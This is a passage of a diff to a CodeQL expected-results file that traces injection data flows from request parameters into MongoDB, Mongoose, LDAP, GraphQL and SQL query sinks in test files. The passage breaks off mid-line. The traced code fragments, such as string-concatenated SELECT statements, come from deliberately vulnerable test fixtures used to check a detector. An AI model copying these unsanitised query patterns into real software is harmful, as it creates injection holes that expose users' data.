semmle.label | param1 | | html-sanitizer.js:14:14:14:24 | xss(param1) | semmle.label | xss(param1) | @@ -84,125 +555,125 @@ nodes | marsdb-flow-to.js:10:17:10:18 | {} | semmle.label | {} | | marsdb-flow-to.js:11:17:11:24 | req.body | semmle.label | req.body | | marsdb-flow-to.js:11:17:11:30 | req.body.title | semmle.label | req.body.title | -| marsdb-flow-to.js:14:17:14:21 | query | semmle.label | query | +| marsdb-flow-to.js:13:17:13:21 | query | semmle.label | query | | marsdb.js:12:9:12:18 | query | semmle.label | query | | marsdb.js:12:17:12:18 | {} | semmle.label | {} | | marsdb.js:13:17:13:24 | req.body | semmle.label | req.body | | marsdb.js:13:17:13:30 | req.body.title | semmle.label | req.body.title | -| marsdb.js:16:12:16:16 | query | semmle.label | query | +| marsdb.js:15:12:15:16 | query | semmle.label | query | | minimongo.js:14:9:14:18 | query | semmle.label | query | | minimongo.js:14:17:14:18 | {} | semmle.label | {} | | minimongo.js:15:17:15:24 | req.body | semmle.label | req.body | | minimongo.js:15:17:15:30 | req.body.title | semmle.label | req.body.title | -| minimongo.js:18:12:18:16 | query | semmle.label | query | +| minimongo.js:17:12:17:16 | query | semmle.label | query | | mongodb.js:12:11:12:20 | query | semmle.label | query | | mongodb.js:12:19:12:20 | {} | semmle.label | {} | | mongodb.js:13:5:13:9 | query | semmle.label | query | | mongodb.js:13:19:13:26 | req.body | semmle.label | req.body | | mongodb.js:13:19:13:32 | req.body.title | semmle.label | req.body.title | -| mongodb.js:18:16:18:20 | query | semmle.label | query | -| mongodb.js:26:11:26:32 | title | semmle.label | title | -| mongodb.js:26:19:26:26 | req.body | semmle.label | req.body | -| mongodb.js:26:19:26:32 | req.body.title | semmle.label | req.body.title | -| mongodb.js:32:18:32:45 | { title ... itle) } | semmle.label | { title ... itle) } | -| mongodb.js:32:27:32:43 | JSON.parse(title) | semmle.label | JSON.parse(title) | -| mongodb.js:32:38:32:42 | title | semmle.label | title | -| mongodb.js:48:11:48:20 | query | semmle.label | query | -| mongodb.js:48:19:48:20 | {} | semmle.label | {} | -| mongodb.js:49:5:49:9 | query | semmle.label | query | -| mongodb.js:49:19:49:33 | req.query.title | semmle.label | req.query.title | -| mongodb.js:54:16:54:20 | query | semmle.label | query | -| mongodb.js:59:8:59:17 | query | semmle.label | query | -| mongodb.js:59:16:59:17 | {} | semmle.label | {} | -| mongodb.js:60:2:60:6 | query | semmle.label | query | -| mongodb.js:60:16:60:30 | req.query.title | semmle.label | req.query.title | -| mongodb.js:65:12:65:16 | query | semmle.label | query | -| mongodb.js:70:7:70:25 | tag | semmle.label | tag | -| mongodb.js:70:13:70:25 | req.query.tag | semmle.label | req.query.tag | -| mongodb.js:77:14:77:26 | { tags: tag } | semmle.label | { tags: tag } | -| mongodb.js:77:22:77:24 | tag | semmle.label | tag | -| mongodb.js:85:12:85:24 | { tags: tag } | semmle.label | { tags: tag } | -| mongodb.js:85:20:85:22 | tag | semmle.label | tag | -| mongodb.js:106:9:106:18 | query | semmle.label | query | -| mongodb.js:106:17:106:18 | {} | semmle.label | {} | -| mongodb.js:107:3:107:7 | query | semmle.label | query | -| mongodb.js:107:17:107:29 | queries.title | semmle.label | queries.title | -| mongodb.js:112:14:112:18 | query | semmle.label | query | +| mongodb.js:17:16:17:20 | query | semmle.label | query | +| mongodb.js:25:11:25:32 | title | semmle.label | title | +| mongodb.js:25:19:25:26 | req.body | semmle.label | req.body | +| mongodb.js:25:19:25:32 | req.body.title | semmle.label | req.body.title | +| mongodb.js:30:18:30:45 | { title ... itle) } | semmle.label | { title ... itle) } | +| mongodb.js:30:27:30:43 | JSON.parse(title) | semmle.label | JSON.parse(title) | +| mongodb.js:30:38:30:42 | title | semmle.label | title | +| mongodb.js:46:11:46:20 | query | semmle.label | query | +| mongodb.js:46:19:46:20 | {} | semmle.label | {} | +| mongodb.js:47:5:47:9 | query | semmle.label | query | +| mongodb.js:47:19:47:33 | req.query.title | semmle.label | req.query.title | +| mongodb.js:51:16:51:20 | query | semmle.label | query | +| mongodb.js:56:8:56:17 | query | semmle.label | query | +| mongodb.js:56:16:56:17 | {} | semmle.label | {} | +| mongodb.js:57:2:57:6 | query | semmle.label | query | +| mongodb.js:57:16:57:30 | req.query.title | semmle.label | req.query.title | +| mongodb.js:61:12:61:16 | query | semmle.label | query | +| mongodb.js:66:7:66:25 | tag | semmle.label | tag | +| mongodb.js:66:13:66:25 | req.query.tag | semmle.label | req.query.tag | +| mongodb.js:72:14:72:26 | { tags: tag } | semmle.label | { tags: tag } | +| mongodb.js:72:22:72:24 | tag | semmle.label | tag | +| mongodb.js:79:12:79:24 | { tags: tag } | semmle.label | { tags: tag } | +| mongodb.js:79:20:79:22 | tag | semmle.label | tag | +| mongodb.js:100:9:100:18 | query | semmle.label | query | +| mongodb.js:100:17:100:18 | {} | semmle.label | {} | +| mongodb.js:101:3:101:7 | query | semmle.label | query | +| mongodb.js:101:17:101:29 | queries.title | semmle.label | queries.title | +| mongodb.js:105:14:105:18 | query | semmle.label | query | | mongodb_bodySafe.js:23:11:23:20 | query | semmle.label | query | | mongodb_bodySafe.js:23:19:23:20 | {} | semmle.label | {} | | mongodb_bodySafe.js:24:5:24:9 | query | semmle.label | query | | mongodb_bodySafe.js:24:19:24:33 | req.query.title | semmle.label | req.query.title | -| mongodb_bodySafe.js:29:16:29:20 | query | semmle.label | query | +| mongodb_bodySafe.js:28:16:28:20 | query | semmle.label | query | | mongoose.js:20:8:20:17 | query | semmle.label | query | | mongoose.js:20:16:20:17 | {} | semmle.label | {} | | mongoose.js:21:2:21:6 | query | semmle.label | query | | mongoose.js:21:16:21:23 | req.body | semmle.label | req.body | | mongoose.js:21:16:21:29 | req.body.title | semmle.label | req.body.title | -| mongoose.js:24:21:24:27 | [query] | semmle.label | [query] | -| mongoose.js:24:22:24:26 | query | semmle.label | query | -| mongoose.js:27:17:27:21 | query | semmle.label | query | -| mongoose.js:30:22:30:26 | query | semmle.label | query | -| mongoose.js:33:21:33:25 | query | semmle.label | query | -| mongoose.js:36:28:36:32 | query | semmle.label | query | -| mongoose.js:39:16:39:20 | query | semmle.label | query | -| mongoose.js:42:19:42:23 | query | semmle.label | query | -| mongoose.js:45:28:45:32 | query | semmle.label | query | -| mongoose.js:48:28:48:32 | query | semmle.label | query | -| mongoose.js:51:28:51:32 | query | semmle.label | query | -| mongoose.js:54:22:54:26 | query | semmle.label | query | -| mongoose.js:57:18:57:22 | query | semmle.label | query | -| mongoose.js:60:22:60:26 | query | semmle.label | query | -| mongoose.js:63:21:63:25 | query | semmle.label | query | -| mongoose.js:65:32:65:36 | query | semmle.label | query | -| mongoose.js:67:27:67:31 | query | semmle.label | query | -| mongoose.js:68:8:68:12 | query | semmle.label | query | -| mongoose.js:71:17:71:21 | query | semmle.label | query | -| mongoose.js:72:10:72:14 | query | semmle.label | query | -| mongoose.js:73:8:73:12 | query | semmle.label | query | -| mongoose.js:74:7:74:11 | query | semmle.label | query | -| mongoose.js:75:16:75:20 | query | semmle.label | query | -| mongoose.js:76:12:76:16 | query | semmle.label | query | -| mongoose.js:77:10:77:14 | query | semmle.label | query | -| mongoose.js:81:37:81:41 | query | semmle.label | query | +| mongoose.js:23:21:23:27 | [query] | semmle.label | [query] | +| mongoose.js:23:22:23:26 | query | semmle.label | query | +| mongoose.js:25:17:25:21 | query | semmle.label | query | +| mongoose.js:27:22:27:26 | query | semmle.label | query | +| mongoose.js:29:21:29:25 | query | semmle.label | query | +| mongoose.js:31:28:31:32 | query | semmle.label | query | +| mongoose.js:33:16:33:20 | query | semmle.label | query | +| mongoose.js:35:19:35:23 | query | semmle.label | query | +| mongoose.js:37:28:37:32 | query | semmle.label | query | +| mongoose.js:39:28:39:32 | query | semmle.label | query | +| mongoose.js:41:28:41:32 | query | semmle.label | query | +| mongoose.js:43:22:43:26 | query | semmle.label | query | +| mongoose.js:45:18:45:22 | query | semmle.label | query | +| mongoose.js:47:22:47:26 | query | semmle.label | query | +| mongoose.js:49:21:49:25 | query | semmle.label | query | +| mongoose.js:51:32:51:36 | query | semmle.label | query | +| mongoose.js:53:27:53:31 | query | semmle.label | query | +| mongoose.js:54:8:54:12 | query | semmle.label | query | +| mongoose.js:57:17:57:21 | query | semmle.label | query | +| mongoose.js:58:10:58:14 | query | semmle.label | query | +| mongoose.js:59:8:59:12 | query | semmle.label | query | +| mongoose.js:60:7:60:11 | query | semmle.label | query | +| mongoose.js:61:16:61:20 | query | semmle.label | query | +| mongoose.js:62:12:62:16 | query | semmle.label | query | +| mongoose.js:63:10:63:14 | query | semmle.label | query | +| mongoose.js:67:37:67:41 | query | semmle.label | query | +| mongoose.js:68:46:68:50 | query | semmle.label | query | +| mongoose.js:69:47:69:51 | query | semmle.label | query | +| mongoose.js:71:46:71:50 | query | semmle.label | query | +| mongoose.js:73:51:73:55 | query | semmle.label | query | +| mongoose.js:75:46:75:50 | query | semmle.label | query | +| mongoose.js:78:46:78:50 | query | semmle.label | query | +| mongoose.js:80:51:80:55 | query | semmle.label | query | | mongoose.js:82:46:82:50 | query | semmle.label | query | -| mongoose.js:83:47:83:51 | query | semmle.label | query | -| mongoose.js:85:46:85:50 | query | semmle.label | query | -| mongoose.js:87:51:87:55 | query | semmle.label | query | -| mongoose.js:89:46:89:50 | query | semmle.label | query | -| mongoose.js:92:46:92:50 | query | semmle.label | query | -| mongoose.js:94:51:94:55 | query | semmle.label | query | -| mongoose.js:96:46:96:50 | query | semmle.label | query | -| mongoose.js:104:21:104:25 | query | semmle.label | query | -| mongoose.js:111:14:111:18 | query | semmle.label | query | -| mongoose.js:113:31:113:35 | query | semmle.label | query | -| mongoose.js:115:6:115:22 | id | semmle.label | id | -| mongoose.js:115:11:115:22 | req.query.id | semmle.label | req.query.id | -| mongoose.js:115:25:115:45 | cond | semmle.label | cond | -| mongoose.js:115:32:115:45 | req.query.cond | semmle.label | req.query.cond | -| mongoose.js:116:22:116:25 | cond | semmle.label | cond | -| mongoose.js:117:21:117:24 | cond | semmle.label | cond | -| mongoose.js:118:21:118:24 | cond | semmle.label | cond | -| mongoose.js:119:18:119:21 | cond | semmle.label | cond | -| mongoose.js:120:22:120:25 | cond | semmle.label | cond | -| mongoose.js:121:16:121:19 | cond | semmle.label | cond | -| mongoose.js:122:19:122:22 | cond | semmle.label | cond | -| mongoose.js:123:20:123:21 | id | semmle.label | id | -| mongoose.js:124:28:124:31 | cond | semmle.label | cond | -| mongoose.js:125:28:125:31 | cond | semmle.label | cond | -| mongoose.js:126:28:126:31 | cond | semmle.label | cond | -| mongoose.js:127:18:127:21 | cond | semmle.label | cond | -| mongoose.js:128:22:128:25 | cond | semmle.label | cond | -| mongoose.js:129:21:129:24 | cond | semmle.label | cond | -| mongoose.js:130:16:130:26 | { _id: id } | semmle.label | { _id: id } | -| mongoose.js:130:23:130:24 | id | semmle.label | id | -| mongoose.js:133:38:133:42 | query | semmle.label | query | -| mongoose.js:136:30:136:34 | query | semmle.label | query | +| mongoose.js:90:21:90:25 | query | semmle.label | query | +| mongoose.js:97:14:97:18 | query | semmle.label | query | +| mongoose.js:99:31:99:35 | query | semmle.label | query | +| mongoose.js:101:6:101:22 | id | semmle.label | id | +| mongoose.js:101:11:101:22 | req.query.id | semmle.label | req.query.id | +| mongoose.js:101:25:101:45 | cond | semmle.label | cond | +| mongoose.js:101:32:101:45 | req.query.cond | semmle.label | req.query.cond | +| mongoose.js:102:22:102:25 | cond | semmle.label | cond | +| mongoose.js:103:21:103:24 | cond | semmle.label | cond | +| mongoose.js:104:21:104:24 | cond | semmle.label | cond | +| mongoose.js:105:18:105:21 | cond | semmle.label | cond | +| mongoose.js:106:22:106:25 | cond | semmle.label | cond | +| mongoose.js:107:16:107:19 | cond | semmle.label | cond | +| mongoose.js:108:19:108:22 | cond | semmle.label | cond | +| mongoose.js:109:20:109:21 | id | semmle.label | id | +| mongoose.js:110:28:110:31 | cond | semmle.label | cond | +| mongoose.js:111:28:111:31 | cond | semmle.label | cond | +| mongoose.js:112:28:112:31 | cond | semmle.label | cond | +| mongoose.js:113:18:113:21 | cond | semmle.label | cond | +| mongoose.js:114:22:114:25 | cond | semmle.label | cond | +| mongoose.js:115:21:115:24 | cond | semmle.label | cond | +| mongoose.js:116:16:116:26 | { _id: id } | semmle.label | { _id: id } | +| mongoose.js:116:23:116:24 | id | semmle.label | id | +| mongoose.js:119:38:119:42 | query | semmle.label | query | +| mongoose.js:122:30:122:34 | query | semmle.label | query | | mongooseJsonParse.js:19:11:19:20 | query | semmle.label | query | | mongooseJsonParse.js:19:19:19:20 | {} | semmle.label | {} | | mongooseJsonParse.js:20:19:20:44 | JSON.pa ... y.data) | semmle.label | JSON.pa ... y.data) | | mongooseJsonParse.js:20:19:20:50 | JSON.pa ... ).title | semmle.label | JSON.pa ... ).title | | mongooseJsonParse.js:20:30:20:43 | req.query.data | semmle.label | req.query.data | -| mongooseJsonParse.js:23:19:23:23 | query | semmle.label | query | +| mongooseJsonParse.js:22:19:22:23 | query | semmle.label | query | | mongooseModelClient.js:10:7:10:32 | v | semmle.label | v | | mongooseModelClient.js:10:11:10:32 | JSON.pa ... body.x) | semmle.label | JSON.pa ... body.x) | | mongooseModelClient.js:10:22:10:29 | req.body | semmle.label | req.body | @@ -237,10 +708,8 @@ nodes | pg-promise.js:22:11:22:15 | query | semmle.label | query | | pg-promise.js:30:13:30:25 | req.params.id | semmle.label | req.params.id | | pg-promise.js:34:13:34:25 | req.params.id | semmle.label | req.params.id | -| pg-promise.js:38:13:42:5 | [\\n ... n\\n ] | semmle.label | [\\n ... n\\n ] | | pg-promise.js:39:7:39:19 | req.params.id | semmle.label | req.params.id | | pg-promise.js:40:7:40:21 | req.params.name | semmle.label | req.params.name | -| pg-promise.js:41:7:41:20 | req.params.foo | semmle.label | req.params.foo | | pg-promise.js:47:11:47:23 | req.params.id | semmle.label | req.params.id | | pg-promise.js:54:11:54:23 | req.params.id | semmle.label | req.params.id | | pg-promise.js:56:14:56:29 | req.params.title | semmle.label | req.params.title | @@ -268,8 +737,8 @@ nodes | socketio.js:10:25:10:30 | handle | semmle.label | handle | | socketio.js:11:12:11:53 | `INSERT ... andle}` | semmle.label | `INSERT ... andle}` | | socketio.js:11:46:11:51 | handle | semmle.label | handle | -| tst2.js:9:27:9:84 | "select ... d + "'" | semmle.label | "select ... d + "'" | -| tst2.js:9:66:9:78 | req.params.id | semmle.label | req.params.id | +| tst2.js:8:27:8:84 | "select ... d + "'" | semmle.label | "select ... d + "'" | +| tst2.js:8:66:8:78 | req.params.id | semmle.label | req.params.id | | tst3.js:7:7:8:55 | query1 | semmle.label | query1 | | tst3.js:8:16:8:34 | req.params.category | semmle.label | req.params.category | | tst3.js:9:14:9:19 | query1 | semmle.label | query1 | @@ -277,481 +746,4 @@ nodes | tst4.js:8:46:8:60 | $routeParams.id | semmle.label | $routeParams.id | | tst.js:10:10:10:64 | 'SELECT ... d + '"' | semmle.label | 'SELECT ... d + '"' | | tst.js:10:46:10:58 | req.params.id | semmle.label | req.params.id | -edges -| graphql.js:8:11:8:28 | id | graphql.js:12:46:12:47 | id | provenance | | -| graphql.js:8:16:8:28 | req.params.id | graphql.js:8:11:8:28 | id | provenance | | -| graphql.js:12:46:12:47 | id | graphql.js:10:34:20:5 | `\\n ... }\\n ` | provenance | | -| graphql.js:26:11:26:28 | id | graphql.js:27:37:27:38 | id | provenance | | -| graphql.js:26:11:26:28 | id | graphql.js:30:39:30:40 | id | provenance | | -| graphql.js:26:11:26:28 | id | graphql.js:33:25:33:26 | id | provenance | | -| graphql.js:26:16:26:28 | req.params.id | graphql.js:26:11:26:28 | id | provenance | | -| graphql.js:27:37:27:38 | id | graphql.js:27:30:27:40 | `foo ${id}` | provenance | | -| graphql.js:30:39:30:40 | id | graphql.js:30:32:30:42 | `foo ${id}` | provenance | | -| graphql.js:33:25:33:26 | id | graphql.js:33:18:33:28 | `foo ${id}` | provenance | | -| graphql.js:39:11:39:28 | id | graphql.js:44:21:44:22 | id | provenance | | -| graphql.js:39:11:39:28 | id | graphql.js:48:51:48:52 | id | provenance | | -| graphql.js:39:16:39:28 | req.params.id | graphql.js:39:11:39:28 | id | provenance | | -| graphql.js:44:21:44:22 | id | graphql.js:44:14:44:24 | `foo ${id}` | provenance | | -| graphql.js:48:51:48:52 | id | graphql.js:48:44:48:54 | `foo ${id}` | provenance | | -| graphql.js:55:11:55:28 | id | graphql.js:56:46:56:47 | id | provenance | | -| graphql.js:55:11:55:28 | id | graphql.js:58:73:58:74 | id | provenance | | -| graphql.js:55:16:55:28 | req.params.id | graphql.js:55:11:55:28 | id | provenance | | -| graphql.js:56:46:56:47 | id | graphql.js:56:39:56:49 | `foo ${id}` | provenance | | -| graphql.js:58:73:58:74 | id | graphql.js:58:66:58:76 | `foo ${id}` | provenance | | -| graphql.js:74:9:74:25 | id | graphql.js:75:56:75:57 | id | provenance | | -| graphql.js:74:9:74:25 | id | graphql.js:88:13:88:14 | id | provenance | | -| graphql.js:74:14:74:25 | req.query.id | graphql.js:74:9:74:25 | id | provenance | | -| graphql.js:75:56:75:57 | id | graphql.js:75:46:75:64 | "{ foo" + id + " }" | provenance | | -| graphql.js:88:13:88:14 | id | graphql.js:84:14:90:8 | `{\\n ... }` | provenance | | -| graphql.js:119:11:119:28 | id | graphql.js:120:45:120:46 | id | provenance | | -| graphql.js:119:16:119:28 | req.params.id | graphql.js:119:11:119:28 | id | provenance | | -| graphql.js:120:45:120:46 | id | graphql.js:120:38:120:48 | `foo ${id}` | provenance | | -| html-sanitizer.js:13:39:13:44 | param1 | html-sanitizer.js:14:18:14:23 | param1 | provenance | | -| html-sanitizer.js:14:5:14:24 | param1 | html-sanitizer.js:16:54:16:59 | param1 | provenance | | -| html-sanitizer.js:14:14:14:24 | xss(param1) | html-sanitizer.js:14:5:14:24 | param1 | provenance | | -| html-sanitizer.js:14:18:14:23 | param1 | html-sanitizer.js:14:14:14:24 | xss(param1) | provenance | Config | -| html-sanitizer.js:16:54:16:59 | param1 | html-sanitizer.js:16:9:16:59 | `SELECT ... param1 | provenance | | -| json-schema-validator.js:25:15:25:48 | query | json-schema-validator.js:33:22:33:26 | query | provenance | | -| json-schema-validator.js:25:15:25:48 | query | json-schema-validator.js:35:18:35:22 | query | provenance | | -| json-schema-validator.js:25:23:25:48 | JSON.pa ... y.data) | json-schema-validator.js:25:15:25:48 | query | provenance | | -| json-schema-validator.js:25:34:25:47 | req.query.data | json-schema-validator.js:25:23:25:48 | JSON.pa ... y.data) | provenance | Config | -| json-schema-validator.js:50:15:50:48 | query | json-schema-validator.js:55:22:55:26 | query | provenance | | -| json-schema-validator.js:50:15:50:48 | query | json-schema-validator.js:59:22:59:26 | query | provenance | | -| json-schema-validator.js:50:15:50:48 | query | json-schema-validator.js:61:22:61:26 | query | provenance | | -| json-schema-validator.js:50:23:50:48 | JSON.pa ... y.data) | json-schema-validator.js:50:15:50:48 | query | provenance | | -| json-schema-validator.js:50:34:50:47 | req.query.data | json-schema-validator.js:50:23:50:48 | JSON.pa ... y.data) | provenance | Config | -| koarouter.js:5:11:5:33 | version | koarouter.js:14:38:14:44 | version | provenance | | -| koarouter.js:5:13:5:19 | version | koarouter.js:5:11:5:33 | version | provenance | | -| koarouter.js:14:9:14:18 | [post update] conditions [ArrayElement] | koarouter.js:17:52:17:61 | conditions [ArrayElement] | provenance | | -| koarouter.js:14:25:14:46 | `versio ... rsion}` | koarouter.js:14:9:14:18 | [post update] conditions [ArrayElement] | provenance | | -| koarouter.js:14:38:14:44 | version | koarouter.js:14:25:14:46 | `versio ... rsion}` | provenance | | -| koarouter.js:17:52:17:61 | conditions [ArrayElement] | koarouter.js:17:52:17:75 | conditi ... and ') | provenance | | -| koarouter.js:17:52:17:75 | conditi ... and ') | koarouter.js:17:27:17:77 | `SELECT ... nd ')}` | provenance | | -| ldap.js:20:7:20:34 | q | ldap.js:22:18:22:18 | q | provenance | | -| ldap.js:20:11:20:34 | url.par ... , true) | ldap.js:20:7:20:34 | q | provenance | | -| ldap.js:20:21:20:27 | req.url | ldap.js:20:11:20:34 | url.par ... , true) | provenance | | -| ldap.js:22:7:22:33 | username | ldap.js:25:24:25:31 | username | provenance | | -| ldap.js:22:7:22:33 | username | ldap.js:25:46:25:53 | username | provenance | | -| ldap.js:22:7:22:33 | username | ldap.js:32:26:32:33 | username | provenance | | -| ldap.js:22:7:22:33 | username | ldap.js:32:48:32:55 | username | provenance | | -| ldap.js:22:7:22:33 | username | ldap.js:64:16:64:23 | username | provenance | | -| ldap.js:22:7:22:33 | username | ldap.js:64:38:64:45 | username | provenance | | -| ldap.js:22:7:22:33 | username | ldap.js:68:33:68:40 | username | provenance | | -| ldap.js:22:18:22:18 | q | ldap.js:22:7:22:33 | username | provenance | | -| ldap.js:25:13:25:57 | `(\|(nam ... ame}))` | ldap.js:28:30:28:34 | opts1 | provenance | Config | -| ldap.js:25:24:25:31 | username | ldap.js:25:13:25:57 | `(\|(nam ... ame}))` | provenance | | -| ldap.js:25:46:25:53 | username | ldap.js:25:13:25:57 | `(\|(nam ... ame}))` | provenance | | -| ldap.js:32:15:32:59 | `(\|(nam ... ame}))` | ldap.js:32:5:32:61 | { filte ... e}))` } | provenance | Config | -| ldap.js:32:26:32:33 | username | ldap.js:32:15:32:59 | `(\|(nam ... ame}))` | provenance | | -| ldap.js:32:48:32:55 | username | ldap.js:32:15:32:59 | `(\|(nam ... ame}))` | provenance | | -| ldap.js:63:9:65:3 | parsedFilter | ldap.js:66:40:66:51 | parsedFilter | provenance | | -| ldap.js:63:24:65:3 | ldap.pa ... ))`\\n ) | ldap.js:63:9:65:3 | parsedFilter | provenance | | -| ldap.js:64:5:64:49 | `(\|(nam ... ame}))` | ldap.js:63:24:65:3 | ldap.pa ... ))`\\n ) | provenance | Config | -| ldap.js:64:16:64:23 | username | ldap.js:64:5:64:49 | `(\|(nam ... ame}))` | provenance | | -| ldap.js:64:38:64:45 | username | ldap.js:64:5:64:49 | `(\|(nam ... ame}))` | provenance | | -| ldap.js:66:40:66:51 | parsedFilter | ldap.js:66:30:66:53 | { filte ... ilter } | provenance | Config | -| ldap.js:68:33:68:40 | username | ldap.js:68:27:68:42 | `cn=${username}` | provenance | | -| marsdb-flow-to.js:10:9:10:18 | query | marsdb-flow-to.js:14:17:14:21 | query | provenance | | -| marsdb-flow-to.js:10:17:10:18 | {} | marsdb-flow-to.js:10:9:10:18 | query | provenance | | -| marsdb-flow-to.js:11:17:11:24 | req.body | marsdb-flow-to.js:11:17:11:30 | req.body.title | provenance | Config | -| marsdb-flow-to.js:11:17:11:30 | req.body.title | marsdb-flow-to.js:10:9:10:18 | query | provenance | Config | -| marsdb-flow-to.js:11:17:11:30 | req.body.title | marsdb-flow-to.js:10:17:10:18 | {} | provenance | Config | -| marsdb-flow-to.js:11:17:11:30 | req.body.title | marsdb-flow-to.js:14:17:14:21 | query | provenance | Config | -| marsdb.js:12:9:12:18 | query | marsdb.js:16:12:16:16 | query | provenance | | -| marsdb.js:12:17:12:18 | {} | marsdb.js:12:9:12:18 | query | provenance | | -| marsdb.js:13:17:13:24 | req.body | marsdb.js:13:17:13:30 | req.body.title | provenance | Config | -| marsdb.js:13:17:13:30 | req.body.title | marsdb.js:12:9:12:18 | query | provenance | Config | -| marsdb.js:13:17:13:30 | req.body.title | marsdb.js:12:17:12:18 | {} | provenance | Config | -| marsdb.js:13:17:13:30 | req.body.title | marsdb.js:16:12:16:16 | query | provenance | Config | -| minimongo.js:14:9:14:18 | query | minimongo.js:18:12:18:16 | query | provenance | | -| minimongo.js:14:17:14:18 | {} | minimongo.js:14:9:14:18 | query | provenance | | -| minimongo.js:15:17:15:24 | req.body | minimongo.js:15:17:15:30 | req.body.title | provenance | Config | -| minimongo.js:15:17:15:30 | req.body.title | minimongo.js:14:9:14:18 | query | provenance | Config | -| minimongo.js:15:17:15:30 | req.body.title | minimongo.js:14:17:14:18 | {} | provenance | Config | -| minimongo.js:15:17:15:30 | req.body.title | minimongo.js:18:12:18:16 | query | provenance | Config | -| mongodb.js:12:11:12:20 | query | mongodb.js:13:5:13:9 | query | provenance | | -| mongodb.js:12:19:12:20 | {} | mongodb.js:12:11:12:20 | query | provenance | | -| mongodb.js:13:5:13:9 | query | mongodb.js:18:16:18:20 | query | provenance | | -| mongodb.js:13:19:13:26 | req.body | mongodb.js:13:19:13:32 | req.body.title | provenance | Config | -| mongodb.js:13:19:13:32 | req.body.title | mongodb.js:12:11:12:20 | query | provenance | Config | -| mongodb.js:13:19:13:32 | req.body.title | mongodb.js:12:19:12:20 | {} | provenance | Config | -| mongodb.js:13:19:13:32 | req.body.title | mongodb.js:13:5:13:9 | query | provenance | Config | -| mongodb.js:13:19:13:32 | req.body.title | mongodb.js:18:16:18:20 | query | provenance | Config | -| mongodb.js:26:11:26:32 | title | mongodb.js:32:38:32:42 | title | provenance | | -| mongodb.js:26:19:26:26 | req.body | mongodb.js:26:19:26:32 | req.body.title | provenance | Config | -| mongodb.js:26:19:26:32 | req.body.title | mongodb.js:26:11:26:32 | title | provenance | | -| mongodb.js:32:27:32:43 | JSON.parse(title) | mongodb.js:32:18:32:45 | { title ... itle) } | provenance | Config | -| mongodb.js:32:38:32:42 | title | mongodb.js:32:27:32:43 | JSON.parse(title) | provenance | Config | -| mongodb.js:48:11:48:20 | query | mongodb.js:49:5:49:9 | query | provenance | | -| mongodb.js:48:19:48:20 | {} | mongodb.js:48:11:48:20 | query | provenance | | -| mongodb.js:49:5:49:9 | query | mongodb.js:54:16:54:20 | query | provenance | | -| mongodb.js:49:19:49:33 | req.query.title | mongodb.js:48:11:48:20 | query | provenance | Config | -| mongodb.js:49:19:49:33 | req.query.title | mongodb.js:48:19:48:20 | {} | provenance | Config | -| mongodb.js:49:19:49:33 | req.query.title | mongodb.js:49:5:49:9 | query | provenance | Config | -| mongodb.js:49:19:49:33 | req.query.title | mongodb.js:54:16:54:20 | query | provenance | Config | -| mongodb.js:59:8:59:17 | query | mongodb.js:60:2:60:6 | query | provenance | | -| mongodb.js:59:16:59:17 | {} | mongodb.js:59:8:59:17 | query | provenance | | -| mongodb.js:60:2:60:6 | query | mongodb.js:65:12:65:16 | query | provenance | | -| mongodb.js:60:16:60:30 | req.query.title | mongodb.js:59:8:59:17 | query | provenance | Config | -| mongodb.js:60:16:60:30 | req.query.title | mongodb.js:59:16:59:17 | {} | provenance | Config | -| mongodb.js:60:16:60:30 | req.query.title | mongodb.js:60:2:60:6 | query | provenance | Config | -| mongodb.js:60:16:60:30 | req.query.title | mongodb.js:65:12:65:16 | query | provenance | Config | -| mongodb.js:70:7:70:25 | tag | mongodb.js:77:22:77:24 | tag | provenance | | -| mongodb.js:70:7:70:25 | tag | mongodb.js:85:20:85:22 | tag | provenance | | -| mongodb.js:70:13:70:25 | req.query.tag | mongodb.js:70:7:70:25 | tag | provenance | | -| mongodb.js:77:22:77:24 | tag | mongodb.js:77:14:77:26 | { tags: tag } | provenance | Config | -| mongodb.js:85:20:85:22 | tag | mongodb.js:85:12:85:24 | { tags: tag } | provenance | Config | -| mongodb.js:106:9:106:18 | query | mongodb.js:107:3:107:7 | query | provenance | | -| mongodb.js:106:17:106:18 | {} | mongodb.js:106:9:106:18 | query | provenance | | -| mongodb.js:107:3:107:7 | query | mongodb.js:112:14:112:18 | query | provenance | | -| mongodb.js:107:17:107:29 | queries.title | mongodb.js:106:9:106:18 | query | provenance | Config | -| mongodb.js:107:17:107:29 | queries.title | mongodb.js:106:17:106:18 | {} | provenance | Config | -| mongodb.js:107:17:107:29 | queries.title | mongodb.js:107:3:107:7 | query | provenance | Config | -| mongodb.js:107:17:107:29 | queries.title | mongodb.js:112:14:112:18 | query | provenance | Config | -| mongodb_bodySafe.js:23:11:23:20 | query | mongodb_bodySafe.js:24:5:24:9 | query | provenance | | -| mongodb_bodySafe.js:23:19:23:20 | {} | mongodb_bodySafe.js:23:11:23:20 | query | provenance | | -| mongodb_bodySafe.js:24:5:24:9 | query | mongodb_bodySafe.js:29:16:29:20 | query | provenance | | -| mongodb_bodySafe.js:24:19:24:33 | req.query.title | mongodb_bodySafe.js:23:11:23:20 | query | provenance | Config | -| mongodb_bodySafe.js:24:19:24:33 | req.query.title | mongodb_bodySafe.js:23:19:23:20 | {} | provenance | Config | -| mongodb_bodySafe.js:24:19:24:33 | req.query.title | mongodb_bodySafe.js:24:5:24:9 | query | provenance | Config | -| mongodb_bodySafe.js:24:19:24:33 | req.query.title | mongodb_bodySafe.js:29:16:29:20 | query | provenance | Config | -| mongoose.js:20:8:20:17 | query | mongoose.js:21:2:21:6 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:24:22:24:26 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:27:17:27:21 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:30:22:30:26 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:33:21:33:25 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:36:28:36:32 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:39:16:39:20 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:42:19:42:23 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:45:28:45:32 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:48:28:48:32 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:51:28:51:32 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:54:22:54:26 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:57:18:57:22 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:60:22:60:26 | query | 